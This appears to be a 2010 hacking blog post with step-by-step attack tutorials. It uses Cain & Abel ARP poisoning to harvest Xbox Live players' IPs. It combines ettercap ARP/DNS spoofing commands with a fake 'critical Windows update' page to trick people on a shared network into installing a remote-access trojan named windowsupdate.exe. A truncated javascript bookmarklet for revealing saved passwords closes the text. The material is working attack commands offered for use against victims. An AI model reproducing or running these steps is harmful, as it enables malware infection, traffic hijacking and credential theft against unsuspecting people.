Wednesday, September 8, 2010

How to setup Cain & Able for getting ip's

first download it here:

DOWNLOAD

If you are running on Vista or Win7 run as admin.

once you download it open it, it should look like this:


[Image: 4rcchy.jpg]

now, click the button at the top left beside the folder icon then sniffer, once that is done right click in the white area and click scan mac address and pick all host in my subnet.

[Image: 15ntaf5.jpg]

if it taking a very long time, change your configure settings until you find the one that works.

now at the bottom go to APR, and press the nuke button at the top left.

[Image: 2j69wtc.jpg]

then left click in the top box

[Image: 2rgj9mv.jpg]

And then press the Blue Plus sign.

and pick your router first, then pick microsoft corp.

now it should say poisoning, and if your connected to xbox live ip's will start to appear.

How to get your rat onto a pc that's on the same network.

This is how to get someone to download your rat if you're on the same network

This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering he same damn question over and over again..

Start by downloading backtrack 4 and burning the iso.


Code:
http://www.remote-exploit.org/backtrack_download.html

Boot into backtrack and open the file browser, and browse to /var/www/. There will be file called index.html.
Open it with kate (or some other text editor) delete the code that is in there and copy in the following code.

Code:

Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required.














Now copy your rat into the same directory and name it windowsupdate.exe

Start apache

Code:
/etc/init.d/apache2 start

open firefox and navigate to 127.0.0.1. Your fake update page should show up.

Now set up the dns_spoofing configuraton

Code:
echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns

Replace 192.168.1.101 with your own ip (ifconfig)

Use nmap to find your target ip

Code:
nmap -sP your_subnet/24

Now arp-poison with ettercap using the dns_spoof plugin.

Code:
ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof

replace 192.168.1.102 with your target's ip.
replace 192.168.1.1 with your gateway ip.
replace wlan0 with your interface.

If you want to target everyone on the network you can use the following command.

Code:
ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ // -P dns_spoof

Now every time they try to navigate to a web page, they will be redirected to your update page.
Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.

Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.

Code:
ipconfig /flushdns

This will let them browse again.

How to reveal Password behind the Asterisk

Hey guys,
               You would have noticed that many people uses firefox or IE to save their passwords, also you would have seen that forms in web pages (eg: Gmail. facebook etc..) contains the passwords which is Asterisk. Do you want to know what is password exactly is, then only thing you have to do is, just replace the URL by this Java script and press enter.


javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j